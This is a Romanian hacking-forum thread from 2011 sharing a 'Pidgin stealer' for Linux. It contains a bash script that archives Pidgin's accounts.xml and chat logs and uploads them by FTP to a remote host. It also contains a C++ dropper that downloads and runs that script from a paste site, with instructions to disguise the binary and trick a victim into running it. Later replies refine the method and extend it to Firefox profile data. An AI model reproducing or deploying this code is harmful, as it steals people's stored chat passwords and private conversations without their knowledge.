[Linux] Simple Pidgin Stealer

pr00f · December 4, 2011

Avem o surs? mic? (virgul?) care preia datele de la Pidgin (http://rstcenter.com/forum/43047-sh0rt-line-c0de-3.rst#post296355) ?i un script c++ care are rolul de a induce victima-n eroare. M? exprim ca naiba, da' în?elege?i voi.

pidgin-getdata @ http://sprunge.us/FQPV

#!/bin/bash

cd $HOME/.purple/

UDIRX='pwd'
HOST='www.site.ro'
FUSER='ftpuser'
PASSWD='ftppasswd'

tar -cf $USER.tar 'logs/' 'accounts.xml'

ftp -n -v $HOST << EOT
ascii
user $FUSER $PASSWD
prompt
mkdir $USER
cd $USER
mput $USER.tar $UDIRX

bye
EOT

rm -rf $USER.tar

steal.cpp

#include <iostream>
#include <stdlib.h>
using namespace std;

int main() {

system("wget http://sprunge.us/FQPV");
system("chmod +x FQPV");
system("./FQPV");
system("rm -rf FQPV");

return 0;

}

Compila?i scriptul c++ cu link-ul vostru, rescrie?i numele la fi?ier, apoi pune?i victima s? ruleze. Mic, de c?cat, dar util.

//

Ce face:
mput $USER.tar $UDIRX
?

Urc? arhiva .tar în directorul curent. Arhiva având ca nume user-ul logat. Pwd este pentru a printa directorul curent.

//

steal.cpp compilat, sa-l numim steal.o, trebuie sa aiba si el drepturi +x ca sa poata executa la randul lui :
system("chmod +x FQPV");

Nu este nevoie. Eu am folosit g++ -o stealer fisier.cpp ?i nu are nevoie de drept de execu?ie.

Edited December 4, 2011 by pr00f

l34k · December 4, 2011

Ce face:

mput $USER.tar $UDIRX

?

Pugna · December 4, 2011

steal.cpp compilat, sa-l numim steal.o, trebuie sa aiba si el drepturi +x ca sa poata executa la randul lui :


system("chmod +x FQPV");

adonisslanic · December 4, 2011

uai, e faina faza xD

Nytro · December 4, 2011

Cam prostie faza cu steal.cpp.

Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat.

Si daca e facut totul din C te scapa de orice fel de dependinte.

Dar ideea e buna, insa mai dificila e partea cu "infectatul".

pr00f · December 4, 2011

Cam prostie faza cu steal.cpp.
Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat.
Si daca e facut totul din C te scapa de orice fel de dependinte.
Dar ideea e buna, insa mai dificila e partea cu "infectatul".

?tiu. Am pornit de la ideea de baz?, ?i am r?mas tot pe scriptul de bash. Sincer, mi-a fost lene s? m? documentez despre arhivat & restul în c/cpp, ?i s?-l fac pe tot bazându-m? pe system() era cam aceea?i chestie.

// Merge ?i la Mozilla, salvând toate chestiile în .mozilla/firefox/

Edited December 4, 2011 by pr00f

Sign In

[Linux] Simple Pidgin Stealer

Recommended Posts

pr00f

l34k

Pugna

adonisslanic

Nytro

pr00f

Join the conversation

Browse

Activity

Pages